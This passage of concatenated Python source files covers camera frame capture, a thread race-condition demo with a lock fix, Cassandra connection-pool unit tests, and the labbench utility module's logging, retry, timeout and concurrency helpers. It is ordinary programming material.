FPSstart = time.time() FPScount = 0 if self.fpsTweak: if self.streamingFPS != 0: # If frame rate gets too fast slow it down, if it gets too slow speed it up if self.streamingFPS > CAPTURE_HZ: time.sleep(1/CAPTURE_HZ) else: time.sleep(self.streamingFPS/(CAPTURE_HZ*CAPTURE_HZ)) def read_jpg(self): """We are using Motion JPEG, and OpenCV captures raw images, so we must encode it into JPEG in order to stream frames to the client. It is nessacery to make the image smaller to improve streaming performance""" capture_blocker = self.captureEvent.wait() frame = self.captureFrame frame = ImageUtils.resize_mjpeg(frame) ret, jpeg = cv2.imencode('.jpg', frame) return jpeg.tostring() def read_frame(self): capture_blocker = self.captureEvent.wait() frame = self.captureFrame return frame def read_processed(self): frame = None with self.captureLock: frame = self.processing_frame while frame == None: # If there are problems, keep retrying until an image can be read. 
with self.captureLock: frame = self.processing_frame frame = ImageUtils.resize_mjpeg(frame) ret, jpeg = cv2.imencode('.jpg', frame) return jpeg.tostring() def dump_video_info(self): logger.info("---------Dumping video feed info---------------------") logger.info("Position of the video file in milliseconds or video capture timestamp: ") logger.info(self.video.get(cv.CV_CAP_PROP_POS_MSEC)) logger.info("0-based index of the frame to be decoded/captured next: ") logger.info(self.video.get(cv.CV_CAP_PROP_POS_FRAMES)) logger.info("Relative position of the video file: 0 - start of the film, 1 - end of the film: ") logger.info(self.video.get(cv.CV_CAP_PROP_POS_AVI_RATIO)) logger.info("Width of the frames in the video stream: ") logger.info(self.video.get(cv.CV_CAP_PROP_FRAME_WIDTH)) logger.info("Height of the frames in the video stream: ") logger.info(self.video.get(cv.CV_CAP_PROP_FRAME_HEIGHT)) logger.info("Frame rate:") logger.info(self.video.get(cv.CV_CAP_PROP_FPS)) logger.info("4-character code of codec.") logger.info(self.video.get(cv.CV_CAP_PROP_FOURCC)) logger.info("Number of frames in the video file.") logger.info(self.video.get(cv.CV_CAP_PROP_FRAME_COUNT)) logger.info("Format of the Mat objects returned by retrieve() .") logger.info(self.video.get(cv.CV_CAP_PROP_FORMAT)) logger.info("Backend-specific value indicating the current capture mode.") logger.info(self.video.get(cv.CV_CAP_PROP_MODE)) logger.info("Brightness of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_BRIGHTNESS)) logger.info("Contrast of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_CONTRAST)) logger.info("Saturation of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_SATURATION)) logger.info("Hue of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_HUE)) logger.info("Gain of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_GAIN)) logger.info("Exposure (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_EXPOSURE)) logger.info("Boolean flags indicating whether images should be converted to RGB.") logger.info(self.video.get(cv.CV_CAP_PROP_CONVERT_RGB)) logger.info("--------------------------End of video feed info---------------------")
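# IPCamera above keeps a daemon thread running get_frame() so that readers always
# see the newest frame, coordinating access with a threading.Event (captureEvent).
# A minimal sketch of that "latest frame" pattern follows; the frame source is a
# plain callable standing in for cv2.VideoCapture.read(), and LatestFrameBuffer is
# an illustrative name, not part of the class above.
import itertools
import threading
import time


class LatestFrameBuffer(object):
    def __init__(self, read_frame):
        self._read_frame = read_frame      # callable returning (success, frame)
        self._frame = None
        self._ready = threading.Event()
        t = threading.Thread(target=self._capture_loop)
        t.daemon = True
        t.start()

    def _capture_loop(self):
        while True:
            success, frame = self._read_frame()
            self._ready.clear()            # mirror IPCamera: clear, store, set
            if success:
                self._frame = frame
                self._ready.set()
            time.sleep(1 / 30.0)           # roughly CAPTURE_HZ

    def read(self):
        self._ready.wait()                 # block until at least one frame exists
        return self._frame


counter = itertools.count()
buf = LatestFrameBuffer(lambda: (True, next(counter)))
time.sleep(0.2)
print("latest frame:", buf.read())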
naive_count.py
import threading


def thread_plus(name):
    global data
    for _ in range(100_000):
        data += 1  # not atomic: the load/add/store can interleave across threads


if __name__ == "__main__":
    data = 0
    threads = list()
    for index in range(10):
        x = threading.Thread(target=thread_plus, args=(index,))
        threads.append(x)
        x.start()

    for h in threads:
        h.join()

    # Usually prints less than the expected 1_000_000 because concurrent
    # increments are lost to the race on `data`.
    print(data)
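# As the comments above note, the unsynchronized increments race with each other.
# A sketch of the same loop guarded by threading.Lock (an illustrative variant,
# not part of the original file):
import threading

lock = threading.Lock()
data = 0


def thread_plus(name):
    global data
    for _ in range(100_000):
        with lock:  # serialize the read-modify-write so no update is lost
            data += 1


if __name__ == "__main__":
    threads = [threading.Thread(target=thread_plus, args=(i,)) for i in range(10)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print(data)  # reliably 1000000 with the lock held around the increment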
test_host_connection_pool.py
try: import unittest2 as unittest except ImportError: import unittest # noqa from mock import Mock, NonCallableMagicMock from threading import Thread, Event from cassandra.cluster import Session from cassandra.connection import Connection, MAX_STREAM_PER_CONNECTION from cassandra.pool import Host, HostConnectionPool, NoConnectionsAvailable, HealthMonitor from cassandra.policies import HostDistance class HostConnectionPoolTests(unittest.TestCase): def make_session(self): session = NonCallableMagicMock(spec=Session, keyspace='foobarkeyspace') session.cluster.get_core_connections_per_host.return_value = 1 session.cluster.get_max_requests_per_connection.return_value = 1 session.cluster.get_max_connections_per_host.return_value = 1 return session def test_borrow_and_return(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) c = pool.borrow_connection(timeout=0.01) self.assertIs(c, conn) self.assertEqual(1, conn.in_flight) conn.set_keyspace.assert_called_once_with('foobarkeyspace') pool.return_connection(conn) self.assertEqual(0, conn.in_flight) self.assertNotIn(conn, pool._trash) def test_failed_wait_for_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) conn.in_flight = MAX_STREAM_PER_CONNECTION # we're already at the max number of requests for this connection, # so we this should fail self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0) def test_successful_wait_for_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) def get_second_conn(): c = pool.borrow_connection(1.0) self.assertIs(conn, c) pool.return_connection(c) t = Thread(target=get_second_conn) t.start() pool.return_connection(conn) t.join() self.assertEqual(0, conn.in_flight) def test_all_connections_trashed(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn session.cluster.get_core_connections_per_host.return_value = 1 # manipulate the core connection setting so that we can # trash the only connection pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.get_core_connections_per_host.return_value = 0 pool._maybe_trash_connection(conn) session.cluster.get_core_connections_per_host.return_value = 1 submit_called = Event() def fire_event(*args, **kwargs): submit_called.set() session.submit.side_effect = fire_event def get_conn(): c = pool.borrow_connection(1.0) 
self.assertIs(conn, c) self.assertEqual(1, conn.in_flight) conn.set_keyspace.assert_called_once_with('foobarkeyspace') pool.return_connection(c) t = Thread(target=get_conn) t.start() submit_called.wait() self.assertEqual(1, pool._scheduled_for_creation) session.submit.assert_called_once_with(pool._create_new_connection) # now run the create_new_connection call pool._create_new_connection() t.join() self.assertEqual(0, conn.in_flight) def test_spawn_when_at_max(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn # core conns = 1, max conns = 2 session.cluster.get_max_connections_per_host.return_value = 2 pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) # make this conn full conn.in_flight = MAX_STREAM_PER_CONNECTION # we don't care about making this borrow_connection call succeed for the # purposes of this test, as long as it results in a new connection # creation being scheduled self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0) session.submit.assert_called_once_with(pool._create_new_connection) def test_return_defunct_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) conn.is_defunct = True host.monitor.signal_connection_failure.return_value = False pool.return_connection(conn) # the connection should be closed a new creation scheduled conn.close.assert_called_once() session.submit.assert_called_once() self.assertFalse(pool.is_shutdown) def test_return_defunct_connection_on_down_host(self): host = Mock(spec=Host, address='ip1') host.monitor = Mock(spec=HealthMonitor) session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) conn.is_defunct = True host.monitor.signal_connection_failure.return_value = True pool.return_connection(conn) # the connection should be closed a new creation scheduled host.monitor.signal_connection_failure.assert_called_once() conn.close.assert_called_once() self.assertFalse(session.submit.called) self.assertTrue(pool.is_shutdown) def test_return_closed_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=True) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) conn.is_closed = True host.monitor.signal_connection_failure.return_value = False pool.return_connection(conn) # a new creation should be scheduled session.submit.assert_called_once() self.assertFalse(pool.is_shutdown)
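# Several tests above coordinate a helper Thread with a threading.Event (e.g.
# submit_called in test_all_connections_trashed) so the main thread can wait for
# a side effect deterministically instead of sleeping. A minimal, driver-independent
# sketch of that wait-for-a-mock-side-effect pattern using unittest.mock:
import threading
from unittest.mock import Mock

submit_called = threading.Event()

session = Mock()
session.submit.side_effect = lambda *args, **kwargs: submit_called.set()


def worker():
    # stand-in for the borrow_connection path that ends up scheduling new work
    session.submit("create_new_connection")


t = threading.Thread(target=worker)
t.start()

assert submit_called.wait(timeout=1.0), "submit() was never called"
session.submit.assert_called_once_with("create_new_connection")
t.join()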
util.py
# This software was developed by employees of the National Institute of # Standards and Technology (NIST), an agency of the Federal Government. # Pursuant to title 17 United States Code Section 105, works of NIST employees # are not subject to copyright protection in the United States and are # considered to be in the public domain. Permission to freely use, copy, # modify, and distribute this software and its documentation without fee is # hereby granted, provided that this notice and disclaimer of warranty appears # in all copies. # # THE SOFTWARE IS PROVIDED 'AS IS' WITHOUT ANY WARRANTY OF ANY KIND, EITHER # EXPRESSED, IMPLIED, OR STATUTORY, INCLUDING, BUT NOT LIMITED TO, ANY WARRANTY # THAT THE SOFTWARE WILL CONFORM TO SPECIFICATIONS, ANY IMPLIED WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND FREEDOM FROM # INFRINGEMENT, AND ANY WARRANTY THAT THE DOCUMENTATION WILL CONFORM TO THE # SOFTWARE, OR ANY WARRANTY THAT THE SOFTWARE WILL BE ERROR FREE. IN NO EVENT # SHALL NIST BE LIABLE FOR ANY DAMAGES, INCLUDING, BUT NOT LIMITED TO, DIRECT, # INDIRECT, SPECIAL OR CONSEQUENTIAL DAMAGES, ARISING OUT OF, RESULTING FROM, # OR IN ANY WAY CONNECTED WITH THIS SOFTWARE, WHETHER OR NOT BASED UPON # WARRANTY, CONTRACT, TORT, OR OTHERWISE, WHETHER OR NOT INJURY WAS SUSTAINED # BY PERSONS OR PROPERTY OR OTHERWISE, AND WHETHER OR NOT LOSS WAS SUSTAINED # FROM, OR AROSE OUT OF THE RESULTS OF, OR USE OF, THE SOFTWARE OR SERVICES # PROVIDED HEREUNDER. Distributions of NIST software should also include # copyright and licensing statements of any third-party software that are # legally bundled with the code in compliance with the conditions of those # licenses. __all__ = [ # "misc" "ConfigStore", "hash_caller", "kill_by_name", "show_messages", "logger", "LabbenchDeprecationWarning", "import_t0", # concurrency and sequencing "concurrently", "sequentially", "Call", "ConcurrentException", "check_hanging_thread", "ThreadSandbox", "ThreadEndedByMaster", # timing and flow management "retry", "until_timeout", "sleep", "stopwatch", "timeout_iter" # wrapper helpers "copy_func", # traceback scrubbing "hide_in_traceback", "_force_full_traceback", # helper objects "Ownable", ] from contextlib import contextmanager, _GeneratorContextManager from functools import wraps from queue import Queue, Empty from threading import Thread, ThreadError, Event from typing import Callable import builtins import hashlib import inspect import logging import psutil import sys import time import traceback from warnings import simplefilter import_t0 = time.perf_counter() logger = logging.LoggerAdapter( logging.getLogger("labbench"), dict( label="labbench" ), # description of origin within labbench (for screen logs only) ) # show deprecation warnings only once class LabbenchDeprecationWarning(DeprecationWarning): pass simplefilter("once", LabbenchDeprecationWarning) import weakref def show_messages(minimum_level, colors=True): """Configure screen debug message output for any messages as least as important as indicated by `level`. Arguments: minimum_level: One of 'debug', 'warning', 'error', or None. If None, there will be no output. 
Returns: None """ import logging err_map = { "debug": logging.DEBUG, "warning": logging.WARNING, "error": logging.ERROR, "info": logging.INFO, None: None, } if minimum_level not in err_map and not isinstance(minimum_level, int): raise ValueError( f"message level must be a flag {tuple(err_map.keys())} or an integer, not {repr(minimum_level)}" ) level = ( err_map[minimum_level.lower()] if isinstance(minimum_level, str) else minimum_level ) logger.setLevel(level) # Clear out any stale handlers if hasattr(logger, "_screen_handler"): logger.logger.removeHandler(logger._screen_handler) if level is None: return logger._screen_handler = logging.StreamHandler() logger._screen_handler.setLevel(level) # - %(pathname)s:%(lineno)d' if colors: from coloredlogs import ColoredFormatter, DEFAULT_FIELD_STYLES log_fmt = "{levelname:^7s} {asctime}.{msecs:03.0f} • {label}: {message}" styles = dict(DEFAULT_FIELD_STYLES, label=dict(color="blue"),) formatter = ColoredFormatter(log_fmt, style="{", field_styles=styles) else: log_fmt = "{levelname:^7s} {asctime}.{msecs:03.0f} • {label}: {message}" formatter = logging.Formatter(log_fmt, style="{") logger._screen_handler.setFormatter(formatter) logger.logger.addHandler(logger._screen_handler) show_messages("info") def _inject_logger_metadata(obj): d = dict( object=repr(obj), origin=type(obj).__qualname__, owned_name=obj._owned_name, ) if d["owned_name"] is not None: d["label"] = d["owned_name"] elif repr(obj) == object.__repr__(obj): d["label"] = type(obj).__qualname__ + "(...)" else: txt = repr(obj) if len(txt) > 20: txt = txt[:-1].split(",")[0] + ")" d["label"] = txt return d def callable_logger(func): if isinstance(getattr(func, "__self__", None), Ownable): return func.__self__._logger else: return logger class Ownable: """Subclass to pull in name from an owning class.""" __objclass__ = None _owned_name = None _logger = logger def __init__(self): self._logger = logging.LoggerAdapter( logger.logger, extra=_inject_logger_metadata(self), ) def __set_name__(self, owner_cls, name): self.__objclass__ = owner_cls self.__name__ = name def __get__(self, owner, owner_cls=None): return self def __owner_init__(self, owner): """called on instantiation of the owner (again for its parent owner)""" if owner._owned_name is None: self._owned_name = self.__name__ else: self._owned_name = owner._owned_name + "." + self.__name__ self._logger.extra.update(**_inject_logger_metadata(self)) def __owner_subclass__(self, owner_cls): """Called after the owner class is instantiated; returns an object to be used in the Rack namespace""" # TODO: revisit whether there should be any assignment of _owned_name here if self._owned_name is None: self._owned_name = self.__name__ return self def __repr__(self): if self.__objclass__ is not None: cls = type(self) ownercls = self.__objclass__ typename = cls.__module__ + "." 
+ cls.__name__ ownedname = ownercls.__qualname__ return f"<{typename} object at {hex(id(self))} bound to {ownedname} class at {hex(id(ownercls))}>" else: return object.__repr__(self) def __str__(self): return self._owned_name or repr(self) class ConcurrentException(Exception): """Raised on concurrency errors in `labbench.concurrently`""" thread_exceptions = [] class OwnerThreadException(ThreadError): """Raised to encapsulate a thread raised by the owning thread during calls to `labbench.concurrently`""" class ThreadEndedByMaster(ThreadError): """Raised in a thread to indicate the owning thread requested termination""" concurrency_count = 0 stop_request_event = Event() sys._debug_tb = False import types TRACEBACK_HIDE_TAG = "🦙 hide from traceback 🦙" def hide_in_traceback(func): def adjust(f): code = f.__code__ if tuple(sys.version_info)[:2] >= (3, 8): f.__code__ = code.replace(co_consts=code.co_consts + (TRACEBACK_HIDE_TAG,)) else: # python < 3.8 f.__code__ = types.CodeType( code.co_argcount, code.co_kwonlyargcount, code.co_nlocals, code.co_stacksize, code.co_flags, code.co_code, code.co_consts + (TRACEBACK_HIDE_TAG,), code.co_names, code.co_varnames, code.co_filename, code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars, code.co_cellvars, ) if not callable(func): raise TypeError(f"{func} is not callable") if hasattr(func, "__code__"): adjust(func) if hasattr(func.__call__, "__code__"): adjust(func.__call__) return func def _force_full_traceback(force: bool): sys._debug_tb = force class _filtered_exc_info: """a monkeypatch for sys.exc_info that removes functions from tracebacks that are tagged with TRACEBACK_HIDE_TAG """ def __init__(self, wrapped): self.lb_wrapped = wrapped def __call__(self): try: etype, evalue, start_tb = self.lb_wrapped() if sys._debug_tb: return etype, evalue, start_tb tb = prev_tb = start_tb # step through the stack traces while tb is not None: if TRACEBACK_HIDE_TAG in tb.tb_frame.f_code.co_consts: # when the tag is present, change the previous tb_next to skip this tb if tb is start_tb: start_tb = start_tb.tb_next else: prev_tb.tb_next = tb.tb_next # on to the next traceback prev_tb, tb = tb, tb.tb_next return etype, evalue, start_tb except BaseException as e: raise def copy_func( func, assigned=("__module__", "__name__", "__qualname__", "__doc__", "__annotations__"), updated=("__dict__",), ) -> callable: """returns a copy of func with specified attributes (following the inspect.wraps arguments). This is similar to wrapping `func` with `lambda *args, **kws: func(*args, **kws)`, except the returned callable contains a duplicate of the bytecode in `func`. The idea that the returned copy has fresh to __doc__, __signature__, etc., which can be changed without independently of `func`. """ new = types.FunctionType( func.__code__, func.__globals__, func.__name__, func.__defaults__, func.__closure__, ) for attr in assigned: setattr(new, attr, getattr(func, attr)) for attr in updated: getattr(new, attr).update(getattr(func, attr)) return new # TODO: remove this def withsignature( cls, name: str, fields: list, defaults: dict, positional: int = None, annotations: dict = {}, ): """Replace cls.__init__ with a wrapper function with an explicit call signature, replacing the actual call signature that can be dynamic __init__(self, *args, **kws) call signature. :fields: iterable of names of each call signature argument : """ # Is the existing cls.__init__ already a __init__ wrapper? 
wrapped = getattr(cls, name) orig_doc = getattr(wrapped, "__origdoc__", cls.__init__.__doc__) reuse = hasattr(wrapped, "__dynamic__") defaults = tuple(defaults.items()) if positional is None: positional = len(fields) # Generate a code object with the adjusted signature code = wrapper.__code__ if tuple(sys.version_info)[:2] >= (3, 8): # there is a new co_posonlyargs argument since 3.8 - use the new .replace # to be less brittle to future signature changes code = code.replace( co_argcount=1 + positional, # to include self co_posonlyargcount=0, co_kwonlyargcount=len(fields) - positional, co_nlocals=len(fields) + 1, # to include self co_varnames=("self",) + tuple(fields), ) else: code = types.CodeType( 1 + positional, # co_argcount len(fields) - positional, # co_kwonlyargcount len(fields) + 1, # co_nlocals code.co_stacksize, code.co_flags, code.co_code, code.co_consts, code.co_names, ("self",) + tuple(fields), # co_varnames code.co_filename, code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars, code.co_cellvars, ) # Generate the new wrapper function and its signature __globals__ = getattr(wrapped, "__globals__", builtins.__dict__) import functools wrapper = types.FunctionType(code, __globals__, wrapped.__name__) wrapper.__doc__ = wrapped.__doc__ wrapper.__qualname__ = wrapped.__qualname__ wrapper.__defaults__ = tuple((v for k, v in defaults[:positional])) wrapper.__kwdefaults__ = {k: v for k, v in defaults[positional:]} wrapper.__annotations__ = annotations wrapper.__dynamic__ = True if not reuse: setattr(cls, name + "_wrapped", wrapped) setattr(cls, name, wrapper) wrapper.__doc__ = wrapper.__origdoc__ = orig_doc if not hasattr(sys.exc_info, "lb_wrapped"): # monkeypatch sys.exc_info if it needs sys.exc_info, exc_info = _filtered_exc_info(sys.exc_info), sys.exc_info def sleep(seconds, tick=1.0): """Drop-in replacement for time.sleep that raises ConcurrentException if another thread requests that all threads stop. """ t0 = time.time() global stop_request_event remaining = 0 while True: # Raise ConcurrentException if the stop_request_event is set if stop_request_event.wait(min(remaining, tick)): raise ThreadEndedByMaster remaining = seconds - (time.time() - t0) # Return normally if the sleep finishes as requested if remaining <= 0: return def check_hanging_thread(): """Raise ThreadEndedByMaster if the process has requested this thread to end. """ sleep(0.0) @hide_in_traceback def retry( exception_or_exceptions, tries=4, delay=0, backoff=0, exception_func=lambda: None ): """This decorator causes the function call to repeat, suppressing specified exception(s), until a maximum number of retries has been attempted. - If the function raises the exception the specified number of times, the underlying exception is raised. - Otherwise, return the result of the function call. :example: The following retries the telnet connection 5 times on ConnectionRefusedError:: import telnetlib # Retry a telnet connection 5 times if the telnet library raises ConnectionRefusedError @retry(ConnectionRefusedError, tries=5) def open(host, port): t = telnetlib.Telnet() t.open(host,port,5) return t Inspired by https://github.com/saltycrane/retry-decorator which is released under the BSD license. 
Arguments: exception_or_exceptions: Exception (sub)class (or tuple of exception classes) to watch for tries: number of times to try before giving up :type tries: int delay: initial delay between retries in seconds :type delay: float backoff: backoff to multiply to the delay for each retry :type backoff: float exception_func: function to call on exception before the next retry :type exception_func: callable """ def decorator(f): @wraps(f) @hide_in_traceback def do_retry(*args, **kwargs): notified = False active_delay = delay for retry in range(tries): try: ret = f(*args, **kwargs) except exception_or_exceptions as e: if not notified: etype = type(e).__qualname__ msg = ( f"caught '{etype}' on first call to '{f.__name__}' - repeating the call " f"{tries-1} more times or until no exception is raised" ) callable_logger(f).info(msg) notified = True ex = e exception_func() sleep(active_delay) active_delay = active_delay * backoff else: break else: raise ex return ret return do_retry return decorator @hide_in_traceback def until_timeout( exception_or_exceptions, timeout, delay=0, backoff=0, exception_func=lambda: None ): """This decorator causes the function call to repeat, suppressing specified exception(s), until the specified timeout period has expired. - If the timeout expires, the underlying exception is raised. - Otherwise, return the result of the function call. Inspired by https://github.com/saltycrane/retry-decorator which is released under the BSD license. :example: The following retries the telnet connection for 5 seconds on ConnectionRefusedError:: import telnetlib @until_timeout(ConnectionRefusedError, 5) def open(host, port): t = telnetlib.Telnet() t.open(host,port,5) return t Arguments: exception_or_exceptions: Exception (sub)class (or tuple of exception classes) to watch for timeout: time in seconds to continue calling the decorated function while suppressing exception_or_exceptions :type timeout: float delay: initial delay between retries in seconds :type delay: float backoff: backoff to multiply to the delay for each retry :type backoff: float exception_func: function to call on exception before the next retry :type exception_func: callable """ def decorator(f): @wraps(f) @hide_in_traceback def do_retry(*args, **kwargs): notified = False active_delay = delay t0 = time.time() while time.time() - t0 < timeout: try: ret = f(*args, **kwargs) except exception_or_exceptions as e: progress = time.time() - t0 if not notified and timeout - progress > 0: etype = type(e).__qualname__ msg = ( f"caught '{etype}' in first call to '{f.__name__}' - repeating calls for " f"another {timeout-progress:0.3f}s, or until no exception is raised" ) callable_logger(f).info(msg) notified = True ex = e exception_func() sleep(active_delay) active_delay = active_delay * backoff else: break else: raise ex return ret return do_retry return decorator def timeout_iter(duration): """sets a timer for `duration` seconds, yields time elapsed as long as timeout has not been reached""" t0 = time.perf_counter() elapsed = 0 while elapsed < duration: yield elapsed elapsed = time.perf_counter() - t0 def kill_by_name(*names): """Kill one or more running processes by the name(s) of matching binaries. Arguments: names: list of names of processes to kill :type names: str :example: >>> # Kill any binaries called 'notepad.exe' or 'notepad2.exe' >>> kill_by_name('notepad.exe', 'notepad2.exe') :Notes: Looks for a case-insensitive match against the Process.name() in the psutil library. 
Though psutil is cross-platform, the naming convention returned by name() is platform-dependent. In windows, for example, name() usually ends in '.exe'. """ for pid in psutil.pids(): try: proc = psutil.Process(pid) for target in names: if proc.name().lower() == target.lower(): logger.info(f"killing process {proc.name()}") proc.kill() except psutil.NoSuchProcess: continue def hash_caller(call_depth=1): """Use introspection to return an SHA224 hex digest of the caller, which is almost certainly unique to the combination of the caller source code and the arguments passed it. """ import inspect import pickle thisframe = inspect.currentframe() frame = inspect.getouterframes(thisframe)[call_depth] arginfo = inspect.getargvalues(frame.frame) # get the function object for a simple function if frame.function in frame.frame.f_globals: func = frame.frame.f_globals[frame.function] argnames = arginfo.args # get the function object for a method in a class elif len(arginfo.args) > 0: # arginfo.args[0] == 'self': name = arginfo.args[0] if name not in frame.frame.f_locals: raise ValueError("failed to find function object by introspection") func = getattr(frame.frame.f_locals[name], frame.function) argnames = arginfo.args[1:] # there weren't any arguments else: argnames = [] args = [arginfo.locals[k] for k in argnames] s = inspect.getsource(func) + str(pickle.dumps(args)) return hashlib.sha224(s.encode("ascii")).hexdigest() @contextmanager def stopwatch(desc: str = "", threshold: float = 0): """Time a block of code using a with statement like this: >>> with stopwatch('sleep statement'): >>> time.sleep(2) sleep statement time elapsed 1.999s. Arguments: desc: text for display that describes the event being timed threshold: only show timing if at least this much time (in s) elapsed : Returns: context manager """ t0 = time.perf_counter() try: yield finally: elapsed = time.perf_counter() - t0 if elapsed >= threshold: msg = str(desc) + " " if len(desc) else "" msg += f"{elapsed:0.3f} s elapsed" exc_info = sys.exc_info() if exc_info != (None, None, None): msg += f" before exception {exc_info[1]}" logger.info(msg.lstrip()) class Call(object): """Wrap a function to apply arguments for threaded calls to `concurrently`. This can be passed in directly by a user in order to provide arguments; otherwise, it will automatically be wrapped inside `concurrently` to keep track of some call metadata during execution. """ def __init__(self, func, *args, **kws): if not callable(func): raise ValueError("`func` argument is not callable") self.func = func self.name = self.func.__name__ self.args = args self.kws = kws self.queue = None def __repr__(self): args = ",".join( [repr(v) for v in self.args] + [(k + "=" + repr(v)) for k, v in self.kws.items()] ) qualname = self.func.__module__ + "." 
+ self.func.__qualname__ return f"Call({qualname},{args})" @hide_in_traceback def __call__(self): try: self.result = self.func(*self.args, **self.kws) except BaseException: self.result = None self.traceback = sys.exc_info() else: self.traceback = None if self.queue is not None: self.queue.put(self) else: return self.result def set_queue(self, queue): """Set the queue object used to communicate between threads""" self.queue = queue @classmethod def wrap_list_to_dict(cls, name_func_pairs): """adjusts naming and wraps callables with Call""" ret = {} # First, generate the list of callables for name, func in name_func_pairs: try: if name is None: if hasattr(func, "name"): name = func.name elif hasattr(func, "__name__"): name = func.__name__ else: raise TypeError(f"could not find name of {func}") if not isinstance(func, cls): func = cls(func) func.name = name if name in ret: msg = ( f"another callable is already named {repr(name)} - " "pass as a keyword argument to specify a different name" ) raise KeyError(msg) ret[name] = func except: raise return ret class MultipleContexts: """Handle opening multiple contexts in a single `with` block. This is a threadsafe implementation that accepts a handler function that may implement any desired any desired type of concurrency in entering each context. The handler is responsible for sequencing the calls that enter each context. In the event of an exception, `MultipleContexts` calls the __exit__ condition of each context that has already been entered. In the current implementation, __exit__ calls are made sequentially (not through call_handler), in the reversed order that each context __enter__ was called. """ def __init__( self, call_handler: Callable[[dict, list, dict], dict], params: dict, objs: list ): """ call_handler: one of `sequentially_call` or `concurrently_call` params: a dictionary of operating parameters (see `concurrently`) objs: a list of contexts to be entered and dict-like objects to return Returns: context object for use in a `with` statement """ # enter = self.enter # def wrapped_enter(name, context): # return enter(name, context) # wrapped_enter.__name__ = 'MultipleContexts_enter_' + hex(id(self)+id(call_handler)) def name(o): return self.abort = False self._entered = {} self.__name__ = "__enter__" # make up names for the __enter__ objects self.objs = [(f"enter_{type(o).__name__}_{hex(id(o))}", o) for _, o in objs] self.params = params self.call_handler = call_handler self.exc = {} @hide_in_traceback def enter(self, name, context): """ enter! 
""" if not self.abort: # proceed only if there have been no exceptions try: context.__enter__() # start of a context entry thread except: self.abort = True self.exc[name] = sys.exc_info() raise else: self._entered[name] = context @hide_in_traceback def __enter__(self): calls = [(name, Call(self.enter, name, obj)) for name, obj in self.objs] try: with stopwatch(f"entry into context for {self.params['name']}", 0.5): self.call_handler(self.params, calls) except BaseException as e: try: self.__exit__(None, None, None) # exit any open contexts before raise finally: raise e @hide_in_traceback def __exit__(self, *exc): with stopwatch(f"{self.params['name']} - context exit", 0.5): for name in tuple(self._entered.keys())[::-1]: context = self._entered[name] if name in self.exc: continue try: context.__exit__(None, None, None) except: exc = sys.exc_info() traceback.print_exc() # don't overwrite the original exception, if there was one self.exc.setdefault(name, exc) contexts = dict(self.objs) for name, exc in self.exc.items(): if name in contexts and name not in self._entered: try: contexts[name].__exit__(None, None, None) except BaseException as e: if e is not self.exc[name][1]: msg = ( f"{name}.__exit__ raised {e} in cleanup attempt after another " f"exception in {name}.__enter__" ) log_obj = callable_logger(contexts[name].__exit__) log_obj.warning(msg) if len(self.exc) == 1: exc_info = list(self.exc.values())[0] raise exc_info[1] elif len(self.exc) > 1: ex = ConcurrentException( f"exceptions raised in {len(self.exc)} contexts are printed inline" ) ex.thread_exceptions = self.exc raise ex if exc != (None, None, None): # sys.exc_info() may have been # changed by one of the exit methods # so provide explicit exception info for h in logger.logger.handlers: h.flush() raise exc[1] RUNNERS = { (False, False): None, (False, True): "context", (True, False): "callable", (True, True): "both", } DIR_DICT = set(dir(dict)) def isdictducktype(cls): return set(dir(cls)).issuperset(DIR_DICT) @hide_in_traceback def enter_or_call(flexible_caller, objs, kws): """Extract value traits from the keyword arguments flags, decide whether `objs` and `kws` should be treated 